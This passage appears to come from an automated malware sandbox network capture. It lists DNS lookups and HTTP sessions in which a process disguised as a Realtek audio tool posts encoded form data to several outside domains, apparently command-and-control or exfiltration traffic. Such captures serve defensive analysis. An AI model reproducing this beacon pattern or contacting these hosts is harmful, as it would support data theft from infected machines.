                                                                                        Dec 12, 2024 21:58:57.965951920 CET4978780192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:58.982177019 CET4978880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:59.140988111 CET8049788103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:59.141194105 CET4978880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:59.143593073 CET4978880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:59.302889109 CET8049788103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:59.303318024 CET8049788103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:59.303361893 CET8049788103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:59.303672075 CET4978880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:59.304320097 CET4978880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:59.463186979 CET8049788103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:59:02.886158943 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:59:04.310343027 CET4978980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:04.441720963 CET8049789199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:04.441890955 CET4978980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:04.448617935 CET4978980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:04.580002069 CET8049789199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:04.580018044 CET8049789199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:04.580029011 CET8049789199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:04.580210924 CET4978980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:05.964329004 CET4978980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:06.981831074 CET4979080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:07.095418930 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.095582962 CET4979080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:07.102186918 CET4979080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:07.215806961 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.244713068 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.244817019 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.244827032 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.245065928 CET4979080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:07.252218962 CET8049790199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:59:07.252346992 CET4979080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:59:08.604921103 CET4979080192.168.11.20199.59.243.227
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                                                                        Dec 12, 2024 21:57:38.785505056 CET9.9.9.9192.168.11.200xcad0No error (0)www.inbulkses.shop104.21.83.167A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:57:38.785505056 CET9.9.9.9192.168.11.200xcad0No error (0)www.inbulkses.shop172.67.179.56A (IP address)IN (0x0001)false
                                                                                        Dec 12, 2024 21:58:02.514465094 CET9.9.9.9192.168.11.200xd97cName error (3)www.ftaane.netnonenoneA (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49715 | 85.159.66.93 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:53:52.346287966 CET | 392 | OUT | GET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.tabyscooterrentals.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:53:52.601542950 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.14.1
                                                                                        Date: Thu, 12 Dec 2024 20:53:52 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        X-Rate-Limit-Limit: 5s
                                                                                        X-Rate-Limit-Remaining: 19
                                                                                        X-Rate-Limit-Reset: 2024-12-12T20:53:57.4767818Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49716 | 194.9.94.86 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:54:17.308638096 CET | 638 | OUT | POST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBvvSv6TElQXFmw40qp1rzeJlstPNmn427iA==
Dec 12, 2024 21:54:17.536559105 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49717 | 194.9.94.86 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:54:20.066692114 CET | 658 | OUT | POST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXda5ep/0Ol63g/BHEH2rtM2aqWrn4FXlVOnA=
Dec 12, 2024 21:54:20.296425104 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49718 | 194.9.94.86 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:54:22.820460081 CET | 2578 | OUT | POST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:54:23.051816940 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:23.051830053 CET | 1289 | IN
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:54:23.051840067 CET | 1289 | IN
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:23.051850080 CET | 1289 | IN
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:23.052042007 CET | 661 | IN
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:23.052053928 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.11.20 | 49719 | 194.9.94.86 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:25.570578098 CET | 380 | OUT | GET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:25.800872087 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:25.800926924 CET | 1289 | IN
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:54:25.800971985 CET | 1289 | IN
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:25.801253080 CET | 1289 | IN
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:25.801306963 CET | 661 | IN
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:25.801403999 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.11.20 | 49720 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:31.063124895 CET | 668 | OUT | POST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGtcav1HZF5Wo+qbYNXzI+jrwvrgM+LJkS+jaVqxhclS4nzzuEauIEAbPLZFmTaHZ3lxRqqRqGP8a3D98nWTS9oVgMHpBr2+p7Fc+tYk8UxUUzQnB2fAKcchC7uwas2lgLT1x+hjbwQWMl98G2MGD8BIWDbJ+h/dNxMHnJzW7Roo89Q25YL4kurQ==
                                                                                        Dec 12, 2024 21:54:31.194598913 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:30 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 87455315-fe22-4fd1-8a59-f25429d6c7ec
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=87455315-fe22-4fd1-8a59-f25429d6c7ec; expires=Thu, 12 Dec 2024 21:09:31 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:31.194617033 CET | 550 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODc0NTUzMTUtZmUyMi00ZmQxLThhNTktZjI1NDI5ZDZjN2VjIiwicGFnZV90aW1lIjoxNzM0MDM2ODcxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.11.20 | 49721 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:33.720623970 CET | 688 | OUT | POST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbAS+CqVp0BckS4nrDuFeuIxAbzDZFqTaHN3lwhqqm+ZPsaxLd8lLDS9oVgMHpVB2+B7Fv2tYF9mvEUwTnB2bAKYchDuuxGC2nYLT1h+h3H/fWMr58H1LWWva8z3Ip+f+s1yJRqTukP1r7gPUGAwJ6l12RW57bZtjrfcEwwNEZDmp1Y=
                                                                                        Dec 12, 2024 21:54:33.852026939 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:33 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: cced1805-dbca-4672-9a15-f68c2566b7ba
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=cced1805-dbca-4672-9a15-f68c2566b7ba; expires=Thu, 12 Dec 2024 21:09:33 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:33.852073908 CET | 550 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2NlZDE4MDUtZGJjYS00NjcyLTlhMTUtZjY4YzI1NjZiN2JhIiwicGFnZV90aW1lIjoxNzM0MDM2ODczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.11.20 | 49722 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:36.363010883 CET | 2578 | OUT | POST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb= [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:36.363084078 CET | 5259 | OUT
                                                                                        Data Ascii: FVgHNF6y3vXmMOsv8C9D2aI0YOYtPrGFBRg/Hku9E6nDHSJCbaX1PhBiwKbgG1npouB0SdVUyizqjEpdzgPU/BpJd1V7ofrD6a8Yrz8pOklgpHc2qTgqlc+ZwFjCvStaA7+jS8onojXuHry3MIwFG1W2vK1A7n9N09qxMQM5mSRwrBq9Hf9LAzxP0tDQS5fmLuq+SI3gCV3f/27tdQuNA9s0QPcsLMYQ1CkdWz8e913fXazrDs+
                                                                                        Dec 12, 2024 21:54:36.494647026 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:35 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: b849ef32-95d2-4714-aa55-8646019f4242
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=b849ef32-95d2-4714-aa55-8646019f4242; expires=Thu, 12 Dec 2024 21:09:36 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:36.494718075 CET | 550 | IN
